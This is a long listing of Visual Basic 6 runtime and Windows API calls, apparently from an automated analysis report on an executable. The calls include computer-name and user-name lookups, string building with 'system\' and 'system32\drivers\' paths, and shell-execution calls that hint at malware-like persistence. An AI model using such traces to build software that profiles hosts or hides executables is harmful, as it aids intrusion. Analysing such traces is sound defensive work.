                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B04E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B059
                                                                                    • #517.MSVBVM60(00000000), ref: 0040B060
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B06B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B078
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B094
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0A0
                                                                                      • Part of subcall function 00429CA0: __vbaSetSystemError.MSVBVM60(00000064,004031C0,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429CF6
                                                                                      • Part of subcall function 00429CA0: #525.MSVBVM60(00000200,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D05
                                                                                      • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D16
                                                                                      • Part of subcall function 00429CA0: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D20
                                                                                      • Part of subcall function 00429CA0: SHGetPathFromIDList.SHELL32(?,00000000), ref: 00429D30
                                                                                      • Part of subcall function 00429CA0: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D3A
                                                                                      • Part of subcall function 00429CA0: __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D43
                                                                                      • Part of subcall function 00429CA0: #537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D50
                                                                                      • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5B
                                                                                      • Part of subcall function 00429CA0: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5F
                                                                                      • Part of subcall function 00429CA0: #616.MSVBVM60(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D73
                                                                                      • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D7E
                                                                                      • Part of subcall function 00429CA0: __vbaStrCat.MSVBVM60(00406544,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D86
                                                                                      • Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D91
                                                                                      • Part of subcall function 00429CA0: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D9D
                                                                                      • Part of subcall function 00429CA0: __vbaFreeStr.MSVBVM60(00429DEF,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DE8
                                                                                    • __vbaStrMove.MSVBVM60(00000024,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0B9
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0C6
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0CF
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0F8
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B105
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B115
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B131
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B13C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B14A
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B155
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B161
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B16C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B179
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B184
                                                                                    • #517.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B18B
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B196
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B1A3
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B1BF
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040B1EB
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B1F8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B208
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B223
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B22E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B23C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B247
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B253
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B25E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B26C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B277
                                                                                    • #517.MSVBVM60(00000000), ref: 0040B27E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B289
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B296
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B2B2
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B2CA
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B2DC
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040B2FC
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040B303
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B30E
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B31B
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040B333
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B34B
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B35D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B368
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040B37D
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040B384
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B38F
                                                                                    • #517.MSVBVM60(00000000), ref: 0040B396
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B3A1
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B3AE
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B3CA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B3E2
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040B3F6
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B403
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000), ref: 0040B43C
                                                                                    • #669.MSVBVM60 ref: 0040B449
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B454
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B461
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040B46A
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B483
                                                                                    • __vbaStrCmp.MSVBVM60(00406F10,?), ref: 0040B49C
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B4BD
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B4E9
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B502
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B50D
                                                                                    • __vbaEnd.MSVBVM60(0042C0D4), ref: 0040B54C
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BA5E
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA6B
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BA7B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA93
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BAA7
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BAB4
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BAC4
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BADC
                                                                                      • Part of subcall function 00429CA0: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DB5
                                                                                    • __vbaStrMove.MSVBVM60(0000001C), ref: 0040BAEE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BB03
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BB0A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BB15
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BB22
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BB3A
                                                                                    • __vbaStrMove.MSVBVM60(00000026), ref: 0040BB56
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BB63
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040BB6C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BB81
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040BB93
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BB9E
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BBB3
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BBBA
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BBC5
                                                                                    • #517.MSVBVM60(00000000), ref: 0040BBCC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BBD7
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BBE4
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040BC00
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BC18
                                                                                    • __vbaStrMove.MSVBVM60(0000001A), ref: 0040BC2A
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BC3F
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BC46
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BC51
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BC5E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BC76
                                                                                      • Part of subcall function 0041E880: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,0040BC8B), ref: 0041E89E
                                                                                      • Part of subcall function 0041E880: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8CE
                                                                                      • Part of subcall function 0041E880: #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8E0
                                                                                      • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E8EB
                                                                                      • Part of subcall function 0041E880: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041E8FC
                                                                                      • Part of subcall function 0041E880: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041E911
                                                                                      • Part of subcall function 0041E880: GetComputerNameA.KERNEL32 ref: 0041E91D
                                                                                      • Part of subcall function 0041E880: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041E92B
                                                                                      • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E934
                                                                                      • Part of subcall function 0041E880: #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041E949
                                                                                      • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E954
                                                                                      • Part of subcall function 0041E880: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041E95D
                                                                                      • Part of subcall function 0041E880: #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041E96D
                                                                                      • Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E978
                                                                                      • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E981
                                                                                      • Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(0041E9B5,?,?,?,00000000,Function_000032B6), ref: 0041E9AE
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BC90
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BC9D
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040BCA6
                                                                                      • Part of subcall function 0041E9D0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041E9EE
                                                                                      • Part of subcall function 0041E9D0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA1E
                                                                                      • Part of subcall function 0041E9D0: #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA30
                                                                                      • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA3B
                                                                                      • Part of subcall function 0041E9D0: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041EA4C
                                                                                      • Part of subcall function 0041E9D0: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA61
                                                                                      • Part of subcall function 0041E9D0: GetUserNameA.ADVAPI32(00000000), ref: 0041EA6D
                                                                                      • Part of subcall function 0041E9D0: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA7B
                                                                                      • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA84
                                                                                      • Part of subcall function 0041E9D0: #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041EA99
                                                                                      • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAA4
                                                                                      • Part of subcall function 0041E9D0: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041EAAD
                                                                                      • Part of subcall function 0041E9D0: #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041EABD
                                                                                      • Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAC8
                                                                                      • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAD1
                                                                                      • Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(0041EB05,?,?,?,00000000,Function_000032B6), ref: 0041EAFE
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BCBD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BCCA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040BCD3
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 0040BCEE
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040BD61
                                                                                    • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040BD7A
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040BD90
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040BD9F
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 0040BDC1
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BDD6
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BDEA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BDF7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BE07
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BE1F
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BE33
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BE40
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BE50
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BE68
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040BE7A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BE85
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BE9A
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BEA1
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BEAC
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BEB9
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BEE9
                                                                                    • __vbaStrCat.MSVBVM60(system32\drivers\,00000000), ref: 0040BEFB
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BF06
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040BF1B
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040BF22
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040BF2D
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BF3A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BF52
                                                                                      • Part of subcall function 00415EC0: __vbaSetSystemError.MSVBVM60(660E6C30,660E6A76,00000000), ref: 00415F0F
                                                                                      • Part of subcall function 00415EC0: __vbaNew2.MSVBVM60(00406520,0042CC34,660E6C30,660E6A76,00000000), ref: 00415F27
                                                                                      • Part of subcall function 00415EC0: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 00415F4C
                                                                                      • Part of subcall function 00415EC0: __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100), ref: 00415F76
                                                                                      • Part of subcall function 00415EC0: __vbaSetSystemError.MSVBVM60(0000000D,00416130,?,00000000), ref: 00415F8F
                                                                                      • Part of subcall function 00415EC0: __vbaFreeObj.MSVBVM60 ref: 00415F9E
                                                                                      • Part of subcall function 00416000: __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416050
                                                                                      • Part of subcall function 00416000: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416075
                                                                                      • Part of subcall function 00416000: __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041609F
                                                                                      • Part of subcall function 00416000: __vbaSetSystemError.MSVBVM60(0000000E,00417A20,?,00000000,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160B8
                                                                                      • Part of subcall function 00416000: __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160C7
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BF8E
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040BFD4
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040BFEF
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040C008
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C013
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C021
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C02C
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040C038
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C043
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C050
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C05B
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000), ref: 0040C088
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040C0B2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C0BD
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C0CB
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C0D6
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040C0E2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C0ED
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C0FB
                                                                                    • #600.MSVBVM60(?,00000002), ref: 0040C111
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C12B
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040C137
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C2F3
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C300
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C310
                                                                                    • __vbaStrMove.MSVBVM60(0000001C), ref: 0040C32C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C339
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040C342
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C357
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C36B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C378
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C388
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C3A5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C3B0
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C3BD
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040C3C6
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C3DB
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C3EF
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C3FC
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C40C
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 0040C423
                                                                                    • #616.MSVBVM60(00000000,-00000001), ref: 0040C439
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C444
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C451
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040C45A
                                                                                    • #709.MSVBVM60(00000000,00406544,000000FF,00000000), ref: 0040C477
                                                                                    • #631.MSVBVM60(00000000,?,0000000A), ref: 0040C4AC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C4B7
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C4C4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040C4CD
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040C4D6
                                                                                    • #611.MSVBVM60 ref: 0040C4E3
                                                                                    • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0040C507
                                                                                    • #705.MSVBVM60(?,00000004), ref: 0040C513
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C51E
                                                                                    • __vbaStrMove.MSVBVM60(at ), ref: 0040C542
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040C549
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C554
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C561
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C56C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C57A
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040C590
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0040C5AE
                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000008,?,00000008), ref: 0040C5C5
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C5E9
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00407978,0000005C), ref: 0040C62F
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040C64A
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C664
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C678
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C686
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C69A
                                                                                    • __vbaStrMove.MSVBVM60(00407CC4), ref: 0040C6CE
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0040C6DE
                                                                                    • #690.MSVBVM60(00000000,00000000), ref: 0040C6EC
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040C70C
                                                                                    • #537.MSVBVM60(000000A0,00000000), ref: 0040C727
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C732
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040C739
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C744
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000,00000000), ref: 0040C757
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C762
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C770
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C77B
                                                                                      • Part of subcall function 004218D0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,0040C78D,00000000,00000000), ref: 004218EE
                                                                                      • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042191B
                                                                                      • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421927
                                                                                      • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421933
                                                                                      • Part of subcall function 004218D0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00421942
                                                                                      • Part of subcall function 004218D0: #648.MSVBVM60(0000000A), ref: 00421961
                                                                                      • Part of subcall function 004218D0: __vbaFreeVar.MSVBVM60 ref: 00421970
                                                                                      • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60(?), ref: 00421984
                                                                                      • Part of subcall function 004218D0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00421992
                                                                                      • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 004219A2
                                                                                      • Part of subcall function 004218D0: #570.MSVBVM60(00000000), ref: 004219A9
                                                                                      • Part of subcall function 004218D0: __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219B6
                                                                                      • Part of subcall function 004218D0: __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219ED
                                                                                      • Part of subcall function 004218D0: #525.MSVBVM60(00000000), ref: 004219F4
                                                                                      • Part of subcall function 004218D0: __vbaStrMove.MSVBVM60 ref: 004219FF
                                                                                      • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 00421A0F
                                                                                      • Part of subcall function 004218D0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00421A1A
                                                                                      • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 00421A2A
                                                                                      • Part of subcall function 004218D0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00421A37
                                                                                      • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60 ref: 00421A4C
                                                                                      • Part of subcall function 004218D0: __vbaStrMove.MSVBVM60(?), ref: 00421A60
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000,00000000), ref: 0040C7A6
                                                                                    • __vbaEnd.MSVBVM60 ref: 0040C7C1
                                                                                    • #535.MSVBVM60(00000000), ref: 0040C7F1
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00407CCC), ref: 0040C81D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C828
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0040C834
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C83F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C84D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C858
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0040C864
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C86F
